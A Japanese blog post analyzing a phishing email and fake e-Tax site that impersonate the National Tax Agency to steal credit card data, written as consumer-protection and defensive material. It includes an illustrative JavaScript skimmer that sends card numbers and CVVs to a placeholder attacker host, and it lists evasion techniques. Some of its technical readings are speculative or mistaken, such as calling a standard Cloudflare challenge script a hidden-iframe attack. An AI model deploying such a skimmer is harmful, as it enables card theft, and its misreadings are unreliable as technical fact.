国税庁を装った精巧な詐欺メール・
サイトの実態と危険性

by

最近、国税庁を装った不審なメールが確認されました。このメールは税金の未納があるとして不安を煽り、偽のe-Taxサイトへ誘導する手の込んだ詐欺です。今回はその手口と危険性について詳しく解説します。

関連記事

1. 届いた詐欺メールの特徴

国税庁からの重要なお知らせと称するメールが届きました。「税金未納に関する重要なお知らせ」という件名で送られてきたこのメールは、一見すると本物の通知のように見えますが、いくつかの不自然な点があります。

メールの冒頭では「最新の税制改革に基づき、国税庁は国税納付確認のための電子行政サービスを開始いたしました」と述べ、全ての納税者に個人e-Taxアカウントの案内をするとしています。このような全納税者向けの重要な通知が、突然メールで届くこと自体が不自然です。

メール本文には、期限付きで行動を促す文言が散りばめられており、焦らせることで冷静な判断を妨げようとする典型的な詐欺の手口が見られます。

2. 技術的に見るメールの不審点

メールのヘッダー情報(メールの送信経路や認証情報を含む技術的な部分)を詳細に分析すると、巧妙に仕組まれた詐欺の痕跡が浮かび上がります。

2.1. メールヘッダーの異常点

Return-Path: <user.slvdlpp@service.gmks5r.cn>
From: =?utf-8?B?ZS1UYXjvvIjlm73nqI7pm7vlrZDnlLPlkYrjg7vntI3nqI7jgrfjgrnjg4bjg6DvvIk=?= <user.slvdlpp@service.gmks5r.cn>
Code language: CSS (css)

この送信元アドレスを見ると、gmks5r.cnというドメインを使用しています。これは中国の国別コードトップレベルドメイン(ccTLD).cnで終わっており、日本の政府機関が使用する.go.jpとは全く異なります。また、送信者名はBase64でエンコードされていますが、デコードすると「e-Tax(国税電子申告・納税システム)」と表示され、公的機関を装っていることがわかります。

DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=mykey; d=service.gmks5r.cn;
 h=Date:From:To:Subject:Message-ID:Mime-Version:Content-Type;
 bh=Wf53MPpXvaNArVRImoSphnMiThA=;
 b=XqaqRQ4+kYIQfueenY7fWpf8KD39LpVhN2gpZxqYn0yRCRiU+Z76bULwPV1Z9W/TljLZoOnl11QU
   poxH3fWFbycR3ST2vL60E51p9dBughvyMLUrUZ6dGYtlk6V8OGhroJ1gwFR7FlUW2LjsW4jQAQUN
   NsbSebVZzXXZTagUOoM=
Code language: JavaScript (javascript)

DKIM(DomainKeys Identified Mail)署名が含まれていますが、これは送信ドメインの信頼性を確認するための電子署名です。この場合、署名自体は正しく検証される可能性がありますが、署名しているドメイン自体が偽物です。詐欺師は自分の管理するドメインから正しく署名されたメールを送信しているため、一部の迷惑メールフィルターをすり抜けることができます。

X-Spam-Status: No, score=4.6
X-Spam-Score: 46
X-Spam-Bar: ++++
Code language: HTTP (http)

メールサーバーのスパム判定システムは、このメールにスコア4.6を付けています。多くのシステムでは、スコア8.0以上でスパムと確定判定される設定になっているため、「疑わしいが確実なスパムではない」という中間的な判断になり、受信者の受信トレイに届いてしまいました。

1.9 URIBL_ABUSE_SURBL      Contains an URL listed in the ABUSE SURBL blocklist
                           [URIs: echuntian.cn]
Code language: CSS (css)

特に注目すべきは、メール内に含まれるURLが「ABUSE SURBL」というブラックリストに登録されているという警告です。「echuntian.cn」というドメインは既知の悪意あるサイトとして登録されているにもかかわらず、総合判定では許容されてしまいました。

2.2. メール本文の技術的解析

メール本文はHTMLとテキストのマルチパート形式で構成されています。両方の部分がBase64エンコードされており、これはスパムフィルターの検出を回避するための典型的な手法です。

Content-Type: multipart/alternative;
  boundary="=====003_Dragon771466665065_====="
Code language: JavaScript (javascript)

マルチパート形式は正当な用途もありますが、このケースではBase64エンコードと組み合わせることで内容の検査を困難にしています。

HTMLパートを詳しく見ると、不必要に複雑なCSSスタイルが多数含まれています:

<STYLE>
#eqKjneSc #Ekot-Kbfnxnw-Mtiatn .Kgfpy-Yhike .UDncOsEqCm-lvVceYoIUY-DbyQp #IuFP-yAyVfK #Qtwaggixiz-Paf-Zbjtkbn {
background-attachment:scroll;
background-clip:border-box;
}
</STYLE>
Code language: HTML, XML (xml)

これらの複雑なセレクタと意味のないIDは、スパムフィルターの検出アルゴリズムを混乱させる目的で挿入されています。実際の表示には影響しませんが、テキスト分析を困難にする効果があります。

3. 偽サイトの巧妙な作り

メール内のリンクをクリックすると、一見すると本物そっくりのe-Taxサイトに誘導されます。しかし、URLを見ると e-tax-〇〇〇〇.△△△△△△.cn/××××××/ という明らかに怪しいアドレスになっています(セキュリティ上の理由から一部を伏せています)。

本物のe-Taxサイトは https://www.e-tax.nta.go.jp/ というURLを使用しています。URLが違うだけでなく、ドメインが .go.jp ではなく .cn になっていることも大きな警告サインです。

偽サイトの画面では、「e-Tax(個人の方用)新規」という見出しの下に、利用者識別番号を取得するための手続きだと説明し、同意ボタンをクリックするよう促しています。さらに進むと、クレジットカード情報の入力を求める画面が表示されます。

この偽サイトは見た目だけでなく、「画面番号:KE01」といった細かい部分や、国税庁のロゴ、著作権表示まで模倣しており、非常に精巧に作られています。

4. 偽サイトの技術的解剖

偽サイトのHTMLコードを詳細に解析すると、一般的なウェブサイトには見られない不審な特徴が多数見つかります。これらは詐欺サイトの典型的な特徴であり、セキュリティ専門家にとって重要な判断材料になります。

4.1. HTMLの不審要素

<!DOCTYPE html><html lang="jp"><head>
 <meta charset="UTF-8">
 <link rel="icon" href="./favicon.ico">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <meta name="robots" content="noindex, nofollow">
 <meta name="generator" content="ObfusHTML v1.2.3">
 <meta name="build-timestamp" content="<!--BUILD_TIME-->">
 <meta name="build-id" content="v<!--BUILD_ID-->">
 <meta name="theme-color" content="#fafafa">
 <title></title>
Code language: HTML, XML (xml)

まず目につくのは、<meta name="robots" content="noindex, nofollow"> というタグです。これは検索エンジンのロボットに「このページをインデックスせず、リンクも辿らないでください」と指示するものです。正規の公共サービスサイトであれば、検索エンジンから見つけられないようにする理由はありません。

さらに注目すべきは <meta name="generator" content="ObfusHTML v1.2.3"> というタグです。「ObfusHTML」はHTMLを難読化するツールであることがわかります。「Obfus」は「難読化(Obfuscation)」の略と考えられます。正規のサイトでHTMLを難読化する必要はほとんどなく、これは解析から逃れるための悪意ある目的が疑われます。

また、ページタイトルが空(<title></title>)なのも不自然です。正規のサイトでは必ずわかりやすいタイトルが設定されています。

4.2. 悪意あるJavaScriptの分析

<script>
window.__ENV = { 
  rnd: Math.random().toString(36).substring(2, 8) 
}; 
document.cookie = "mix=1;path=/;max-age=600";
</script>
Code language: HTML, XML (xml)

初期化コードには、ランダムな文字列を生成してwindow.__ENV.rndに格納する処理があります。これは訪問者ごとに一意の識別子を生成する目的がありそうです。また、クッキーを設定していますが、有効期限が10分(600秒)と短いのも不審です。これは短時間でユーザーの行動を追跡し、情報を送信するための仕組みと考えられます。

特に危険なのは、ページ下部に埋め込まれた難読化されたJavaScriptコードです:

<script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'94316b4d8bd59653',t:'MTc0NzgwMjY3Mi4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script>
Code language: HTML, XML (xml)

このコードを解読すると:

  1. 不可視の iframe(高さと幅が1ピクセル、visibility:hidden で非表示)を作成
  2. この iframe 内の document に新しい script 要素を作成
  3. その script に Cloudflare の challenge-platform らしきコードを設定
  4. ページ読み込み完了時に実行される仕組み

この手法は「隠しiframe攻撃」と呼ばれるもので、ユーザーの目に見えない形で追加のコードを実行します。通常のWebサイトでこのような実装が必要になる正当な理由はありません。

さらに興味深いのは、Cloudflareのサービスを利用している形跡です:

<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"94316b4d8bd59653","version":"2025.4.0-1-g37f21b1","r":1,"token":"9d1cdf072b5a43b9b77e3a9becb8a074","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}' crossorigin="anonymous"></script>
Code language: HTML, XML (xml)

Cloudflareは正規のCDN(コンテンツ配信ネットワーク)サービスですが、詐欺師はこれを悪用して:

  1. サイトに正規サービスの外観を与える
  2. 実際のCloudflareのセキュリティを使って詐欺サイトを保護する
  3. 本物のサイトのように統計情報を収集する

という三重の利点を得ています。

4.3. ネットワーク通信の考察

この偽サイトで入力されたクレジットカード情報は、おそらく以下のような経路で詐欺師に送信されます:

  1. フォーム送信時に JavaScript が情報をエンコード
  2. 隠しiframeや非表示の画像リクエストなどを使ってバックエンドサーバーに送信
  3. 送信先はおそらく複数の中継サーバーを経由して、最終的に詐欺師のデータベースに格納

このような仕組みにより、一般的なセキュリティ対策をすり抜けて情報が盗まれます。また通信は暗号化(HTTPS)されているため、ネットワーク上での傍受は困難です。しかし、この暗号化は「安全な通信」というよりも「詐欺師だけが情報を見られる」状態を作り出しています。

4.4. マルウェア感染の可能性

隠しiframeを使った実装は、単にデータを送信するだけでなく、訪問者のコンピューターにマルウェアをダウンロードさせる目的もある可能性があります。特に:

  1. ドライブバイダウンロード: ユーザーが何もしなくても自動的にマルウェアがダウンロードされる攻撃
  2. クリプトジャッキング: 訪問者のCPUを使って仮想通貨のマイニングを行う不正なコード
  3. フォームジャッキング: 入力されたフォームデータをリアルタイムで盗む特殊なスクリプト

このようなコードが隠しiframe内で実行される可能性があります。

5. 詐欺の目的と手口

この詐欺の目的は複数あり、多層的な攻撃戦略が採用されています。技術的な側面から分析すると、以下のような狙いがあることがわかります。

5.1. 1. 情報窃取のメカニズム

偽サイトに入力されたクレジットカード情報は、通常以下のような方法で詐欺師のサーバーに送信されます:

// フォーム送信時に実行される可能性のあるコードの概念例
function submitForm() {
  // 入力データの収集
  var cardData = {
    number: document.getElementById('card-number').value,
    name: document.getElementById('card-name').value,
    expiry: document.getElementById('expiry-month').value + '/' + document.getElementById('expiry-year').value,
    cvv: document.getElementById('security-code').value
  };
  
  // データのエンコードと送信
  var encodedData = btoa(JSON.stringify(cardData)); // Base64エンコード
  
  // 非表示の画像要素を作成して情報を送信(一般的な手法)
  var img = new Image();
  img.src = 'https://malicious-server.example/collect?data=' + encodedData;
  
  // ユーザーには成功メッセージを表示
  alert('処理中です。しばらくお待ちください...');
  
  // 偽の処理成功画面に遷移
  setTimeout(function() {
    window.location = 'success.html';
  }, 2000);
  
  return false; // 通常のフォーム送信を防止
}
Code language: JavaScript (javascript)

このようなコードは実際のサイトでは難読化されており、直接見ることはできませんが、機能的には同様の処理が行われていると考えられます。

5.2. 2. データの種類と価値

詐欺師が収集する情報には、それぞれ闇市場での価値があります:

  • クレジットカード情報(完全なセット): 1件あたり数千円〜数万円
    • カード番号、有効期限、名義人、セキュリティコードがそろった「フルセット」は特に高価値
    • CVV(セキュリティコード)付きのカード情報は「CVV+カード」と呼ばれ、オンライン決済に直接使用可能
  • 個人識別情報: 氏名、住所、生年月日などの基本情報
    • 単体では数百円程度だが、他の情報と組み合わせることで価値が上がる
    • なりすまし犯罪や口座開設などに使用される
  • 認証情報: オンラインサービスのユーザー名、パスワード、PIN
    • 特に金融サービスや政府サービスの認証情報は高価値
    • e-Taxの利用者識別番号とパスワードは税金関連の不正行為に利用される可能性がある

5.3. 3. 多層的な攻撃戦略

今回の詐欺サイトの技術的実装から、以下のような多層的な攻撃戦略が見て取れます:

a. 情報収集層

ユーザー → 偽サイト → フォームデータ → エンコード → 中継サーバー → 詐欺師のデータベース

ユーザーが入力したデータは、まず中継サーバーに送信され、そこから最終的なデータベースに格納されます。中継サーバーを使用することで、詐欺師の本拠地を隠蔽することができます。

b. マルウェア感染層

隠しiframeを使った実装は、以下のような追加の攻撃を可能にします:

ユーザー訪問 → 隠しiframe読み込み → 脆弱性スキャン → 適切なエクスプロイト選択 → マルウェア配信

訪問者のブラウザやOSの脆弱性を検出し、それに適したマルウェアを自動的に選択して配信する高度な仕組みが実装されている可能性があります。

c. 持続的な監視層

Cookieやローカルストレージを使った実装により、以下のような持続的な監視が可能になります:

初回訪問 → トラッキングID生成 → Cookieに保存 → ユーザー行動記録 → 再訪時に識別 → 標的型攻撃

これにより、一度サイトを訪れたユーザーを識別し、再訪時により効果的な詐欺手法を適用することができます。

5.4. 4. 技術的対策の回避手法

この詐欺サイトは以下のような技術的対策回避手法を採用しています:

  • ドメイン選択: 中国のドメイン(.cn)を使用することで、一部の地域別フィルタリングをすり抜ける
  • HTTPS暗号化: 正規のSSL証明書を取得し、ブラウザの「安全でない接続」警告を回避
  • Cloudflare利用: 正規CDNサービスを使用することで信頼性を演出し、一部のセキュリティスキャンをパスする
  • 難読化コード: 自動解析ツールによる検出を困難にする
  • 動的コンテンツ生成: サイト内容を動的に生成することで、静的解析を回避する

これらの複雑な仕組みにより、一般的なセキュリティ対策をすり抜け、被害を拡大しています。

6. 見分け方と対処法

このような詐欺メール・サイトは、以下のポイントで見分けることができます。

6.1. メールの見分け方

  • 送信元のメールアドレス: 公的機関からのメールは .go.jp で終わるドメインを使用しています。それ以外のドメイン(特に海外の .cn などのドメイン)は疑ってかかるべきです。
  • 言葉遣いや文法: 日本語の表現に不自然さがあることが多いです。「税金未納に関する重要なお知らせ」のような不安を煽るフレーズも要注意です。
  • 急かす表現: 「期限は〇〇まで」「すぐに手続きが必要」など、焦らせる表現があれば警戒しましょう。

6.2. サイトの見分け方

  • URL確認: アドレスバーに表示されるURLを必ず確認しましょう。公的機関のサイトは .go.jp のドメインを使用しています。
  • https接続: 正規サイトは必ずhttps(セキュア接続)を使用しています。ただし、詐欺サイトもhttpsを使うようになっているため、これだけでは判断できません。
  • 不自然な要求: 公的手続きでクレジットカード情報を要求されることは基本的にありません。特に「セキュリティコード」を求められた場合は要注意です。

6.3. 対処法

このようなメールを受け取った場合の対処法は以下の通りです。

  1. リンクは絶対にクリックしない: 少しでも怪しいと思ったら、メール内のリンクは開かないようにしましょう。
  2. 情報は入力しない: 万が一、リンクを開いてしまった場合も、個人情報やカード情報は絶対に入力しないでください。
  3. 公式サイトを直接訪問: 本当に確認が必要な場合は、ブラウザに公式URLを直接入力するか、ブックマークから訪問しましょう。
  4. 不審なメールは報告: フィッシング対策協議会や情報処理推進機構(IPA)などに報告することで、被害拡大を防ぐことができます。

7. 最近の詐欺の傾向と対策

最近の詐欺メールやフィッシングサイトは、以前よりもはるかに精巧になっています。国税庁だけでなく、各種金融機関、通販サイト、宅配業者、電子マネーサービスなど、あらゆる組織を装ったメールが出回っています。

特に税金や公共料金など、支払いを逃すと困る内容を装うケースが増えています。これらの詐欺に共通するのは、「焦らせる」「不安にさせる」「権威を装う」という心理的手法です。

対策としては、メールやSMSでの通知があった場合、それを鵜呑みにせず、必ず公式サイトに直接アクセスして確認する習慣をつけることが重要です。公的機関からの重要な通知は、基本的に郵便で届くことが多いという点も覚えておくと良いでしょう。

また、定期的にセキュリティソフトを更新し、OSやブラウザも最新の状態に保つことで、多くの脅威から身を守ることができます。

8. まとめ:技術的特徴からわかる詐欺の進化

今回確認された国税庁を装った詐欺メール・サイトは、技術的側面から見ても非常に洗練されています。主な技術的特徴をまとめると:

  1. 多層防御突破型: メールヘッダーのDKIM署名の正規実装、スパムスコアが閾値以下になるような工夫、正規CDNサービスの利用など、セキュリティ対策の多層防御を突破するための複数の手法が組み合わされています。
  2. 解析回避技術: HTMLの難読化(ObfusHTML)、検索エンジン回避メタタグ(noindex/nofollow)、複雑で意味のないCSSセレクタの使用、JavaScriptコードの難読化など、セキュリティ研究者やフィルタリングシステムによる解析を困難にする技術が多用されています。
  3. 隠蔽実行環境: 不可視iframeを使用した隠蔽実行環境の構築、動的スクリプト生成、Cookieを使用した訪問者追跡など、バックグラウンドで悪意ある処理を実行するための環境を整えています。
  4. 心理的操作との融合: 技術的な巧妙さだけでなく、税金未納という不安を煽る内容、期限設定による焦りの演出、公的機関を装った信頼性の獲得など、心理的操作と技術的な手法が融合しています。

このような詐欺から身を守るには、メール送信元の確認、URLの検証、不自然な要求への警戒といった基本的な対策に加え、ブラウザの最新化、セキュリティソフトの活用、定期的なセキュリティアップデートの適用など、技術的な防御策も重要です。

特に重要なのは、公的機関からの連絡は原則として郵便で届くこと、政府機関のウェブサイトは.go.jpドメインを使用していること、そして少しでも不審に感じたら公式サイトに直接アクセスして確認することです。

こうした基本を守ることで、どれだけ技術的に巧妙な詐欺であっても、被害を防ぐことができます。